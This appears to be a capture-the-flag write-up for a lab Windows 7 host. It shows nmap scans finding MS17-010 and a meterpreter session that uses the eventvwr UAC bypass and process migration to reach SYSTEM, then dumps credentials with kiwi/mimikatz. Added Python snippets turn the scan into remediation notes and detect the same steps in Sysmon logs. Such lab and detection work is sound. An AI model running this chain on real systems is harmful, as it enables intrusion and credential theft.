```
nmap --min-rate=10000 -p- ice.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 11:57 UTC
Warning: 10.10.109.255 giving up on port because retransmission cap hit (10).
Nmap scan report for ice.thm (10.10.109.255)
Host is up (0.017s latency).
Not shown: 63585 closed tcp ports (reset), 1938 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
8000/tcp  open  http-alt
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
MAC Address: 02:F8:44:2A:6E:35 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 20.11 seconds
```
Add a hosts entry for ice.thm.
```
nmap -sC -sT -sV -O -p135,139,445,3389,5357,8000 ice.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 11:58 UTC
Nmap scan report for ice.thm (10.10.109.255)
Host is up (0.0060s latency).

PORT     STATE SERVICE            VERSION
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: DARK-PC
|   NetBIOS_Domain_Name: DARK-PC
|   NetBIOS_Computer_Name: DARK-PC
|   DNS_Domain_Name: Dark-PC
|   DNS_Computer_Name: Dark-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2024-04-02T11:59:39+00:00
|_ssl-date: 2024-04-02T11:59:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2024-04-01T11:47:40
|_Not valid after:  2024-10-01T11:47:40
5357/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open  http               Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:F8:44:2A:6E:35 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: -1s
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02f8442a6e35 (unknown)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Dark-PC
|   NetBIOS computer name: DARK-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-02T06:59:39-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-04-02T11:59:39
|_  start_date: 2024-04-02T11:47:38

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.37 seconds
```
```
nmap --script=vuln -p135,139,445,3389,5357,8000 ice.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 12:00 UTC
Nmap scan report for ice.thm (10.10.109.255)
Host is up (0.00037s latency).

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi
8000/tcp open  http-alt
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
MAC Address: 02:F8:44:2A:6E:35 (Unknown)

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 101.69 seconds
```
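The three scans above already contain what a defender needs to prioritise on this host: SMB reachable from the network with signing not required, smb-vuln-ms17-010 reported as VULNERABLE, and RDP exposed. As an added example that is not part of the original writeup, the Python below parses a constructed excerpt of that nmap output (SCAN) into findings with remediation notes; the finding ids and the remediation wording are my own assumptions.

```python
import re
# Constructed excerpt modelled on the nmap output in this writeup (not a live scan).
SCAN = """\
PORT      STATE SERVICE
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
8000/tcp  open  http-alt
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|_smb-vuln-ms10-054: false
"""

# Assumed remediation wording keyed by finding id; not text from the page.
REMEDIATION = {
    "exposed-service": "limit SMB/RDP reachability with a host firewall or segmentation",
    "smb-signing-not-required": "require SMB signing (RequireSecuritySignature=1 under LanmanServer\\Parameters)",
    "smb-vuln-ms17-010": "install the MS17-010 update and disable SMBv1",
}

def open_services(scan_text):
    """Return {port: service} for every open TCP port in the scan."""
    return dict(re.findall(r"^(\d+)/tcp\s+open\s+(\S+)", scan_text, re.M))

def vuln_states(scan_text):
    """Map each smb-vuln-* NSE script to the state it reported."""
    states, current = {}, None
    for line in scan_text.splitlines():
        head = re.match(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$", line)
        if head:  # script header: one-liners carry their result on the same line
            current = head.group(1)
            states[current] = head.group(2).strip() or "unknown"
        elif current and "State:" in line:  # multi-line block: take its State: line
            states[current] = line.split("State:", 1)[1].strip()
    return states

def triage(scan_text):
    """Turn raw scan text into (finding, evidence, remediation) tuples."""
    findings = []
    for port, svc in open_services(scan_text).items():
        if port in ("445", "3389"):
            findings.append(("exposed-service", f"{port}/tcp {svc}", REMEDIATION["exposed-service"]))
    if re.search(r"message_signing:\s*disabled", scan_text):
        findings.append(("smb-signing-not-required", "smb-security-mode", REMEDIATION["smb-signing-not-required"]))
    for script, state in vuln_states(scan_text).items():
        if state.upper().startswith("VULNERABLE"):
            findings.append((script, f"State: {state}", REMEDIATION.get(script, "patch and re-scan")))
    return findings
```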
```
meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```
Use MSF to look for privilege-escalation possibilities.
```
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.109.255 - Collecting local exploits for x86/windows...
[*] 10.10.109.255 - 193 exploit checks are being tried...
[+] 10.10.109.255 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.109.255 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.109.255 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.109.255 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.109.255 - Valid modules for session 2:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
```
This room has us use exploit/windows/local/bypassuac_eventvwr.
After setting the session, run it again and check which privileges we have.
```
meterpreter > getprivs

Enabled Process Privileges
==========================

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 4008 to 4060...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Use kiwi (which can be thought of as a more powerful version of mimikatz) to dump passwords; load it:
```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lmkdir        Create new directory on local machine
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Kiwi Commands
=============

    Command               Description
    -------               -----------
    creds_all             Retrieve all credentials (parsed)
    creds_kerberos        Retrieve Kerberos creds (parsed)
    creds_livessp         Retrieve Live SSP creds
    creds_msv             Retrieve LM/NTLM creds (parsed)
    creds_ssp             Retrieve SSP creds
    creds_tspkg           Retrieve TsPkg creds (parsed)
    creds_wdigest         Retrieve WDigest creds (parsed)
    dcsync                Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm           Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create  Create a golden kerberos ticket
    kerberos_ticket_list  List all kerberos tickets (unparsed)
    kerberos_ticket_purge Purge any in-use kerberos tickets
    kerberos_ticket_use   Use a kerberos ticket
    kiwi_cmd              Execute an arbitrary mimikatz command (unparsed)
    lsa_dump_sam          Dump LSA SAM (unparsed)
    lsa_dump_secrets      Dump LSA secrets (unparsed)
    password_change       Change the password/hash of a user
    wifi_list             List wifi profiles/creds for the current user
    wifi_list_shared      List shared wifi profiles/creds (requires SYSTEM)
```
The creds_all command retrieves all credentials.
```
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
```
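The post-exploitation chain in this writeup leaves host-level traces a sensor can catch: the eventvwr UAC bypass writes the mscfile\shell\open\command registry key under the user's hive, migrate creates a remote thread in a service process (spoolsv.exe here), and creds_all reads LSASS memory. As an added example that is not from the original writeup, the Python below runs those three checks over constructed Sysmon-style records (EVENTS); the file paths, SID, allowlists and alert names are assumptions.

```python
import re

# Constructed Sysmon-style records (not logs from this box) modelled on the three
# post-exploitation steps in the writeup. Paths, SIDs and names are assumptions.
EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\Dark\AppData\Local\Temp\svc.exe",
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Classes\mscfile\shell\open\command\(Default)"},
    {"EventID": 8, "SourceImage": r"C:\Users\Dark\AppData\Local\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\winlogon.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\spoolsv.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

# Service/system processes an implant typically migrates into (spoolsv.exe here).
INJECTION_TARGETS = {"spoolsv.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}
# Assumed allowlist of sources that legitimately create threads in those processes.
TRUSTED_SOURCES = {"csrss.exe", "services.exe", "svchost.exe"}
PROCESS_VM_READ = 0x10  # access right a credential dumper needs on LSASS
UAC_BYPASS_KEY = re.compile(r"\\Classes\\mscfile\\shell\\open\\command", re.I)

def basename(path):
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, detail) alerts for the events that match a rule."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 13 and UAC_BYPASS_KEY.search(ev["TargetObject"]):
            # Registry write: Event Viewer's mscfile handler hijacked for a UAC bypass
            alerts.append(("uac-bypass-eventvwr", basename(ev["Image"])))
        elif eid == 8:
            # CreateRemoteThread from an untrusted source into a system/service process
            src, dst = basename(ev["SourceImage"]), basename(ev["TargetImage"])
            if dst in INJECTION_TARGETS and src not in TRUSTED_SOURCES:
                alerts.append(("remote-thread-injection", f"{src} -> {dst}"))
        elif eid == 10 and basename(ev["TargetImage"]) == "lsass.exe":
            # ProcessAccess: LSASS opened with VM_READ (0x1010 is the classic mask)
            if int(ev["GrantedAccess"], 16) & PROCESS_VM_READ:
                alerts.append(("lsass-credential-access", basename(ev["SourceImage"])))
    return alerts

if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```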